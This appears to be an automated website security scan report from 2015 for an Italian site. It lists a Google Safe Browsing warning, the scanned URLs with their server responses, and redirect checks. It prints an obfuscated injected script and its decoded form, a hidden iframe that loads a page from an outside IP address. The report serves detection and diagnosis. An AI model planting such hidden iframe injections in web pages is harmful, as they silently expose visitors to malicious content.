Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=barbagiamandrolisai.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.barbagiamandrolisai.it/ | 200 OK Content-Length: 13132 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape('\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x31\x39\x35\x2E\x32\x34\x32\x2E\x31\x36\x31\x2E\x39\x36\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79\x3A\x20\x68\x69\x64\x64\x65\x6E\x3B\x20\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x6E\x6F\x6E\x65\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x20')) Decoded script: <iframe src="http://195.242.161.96/index.php" style="visibility: hidden; display: none"></iframe> | ||
http://www.svagostat.com/getjs.php?id=3650 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 08 Jan 2015 10:07:45 GMT Location: http://ww1.svagostat.com Server: nginx/1.0.15 Content-Type: text/html | clean |
http://ww1.svagostat.com/ | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: Keep-Alive Date: Thu, 08 Jan 2015 10:07:46 GMT Pragma: no-cache Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=109 Set-Cookie: gvc=923vr1682572661929812; expires=Tue, 07-Jan-2020 10:07:46 GMT; path=/; domain=ww1.svagostat.com; httponly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKrfIMFkSaoTSqKmC+BrghK0CpDHc0MuVzmMHin8LIORhpXbped+iYhSnZurWnEO0zcKcVIrzp026LVc5pMB9bUCAwEAAQ==_o/fX1Hf7knTR2Hlp06W9XmgiEX/MJrd0dnj+/2e8vMRuI1otig5Ehazq/LLp98fp32Z17Sb2o7GbuNR6MOCEJQ== | clean |
http://ww1.svagostat.com/rg-erdr.php?_rpo=t | HTTP/1.1 302 Found Connection: Keep-Alive Date: Thu, 08 Jan 2015 10:07:47 GMT Location: http://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=&domain_name=ww1.svagostat.com&channel=&drid=&output=html Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=106 | clean |
http://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=&domain_name=ww1.svagostat.com&channel=&drid=&output=html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://dp.g.doubleclick.net/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://dp.g.doubleclick.net//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://www.barbagiamandrolisai.it//www.google.com/ | 404 Not Found Content-Length: 213 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: barbagiamandrolisai.it
Result:
GET / HTTP/1.1
Host: barbagiamandrolisai.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: barbagiamandrolisai.it
Referer: http://www.google.com/search?q=barbagiamandrolisai.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: barbagiamandrolisai.it
Referer: http://www.google.com/search?q=barbagiamandrolisai.it
Result:
The result is similar to the first query. There are no suspicious redirects found.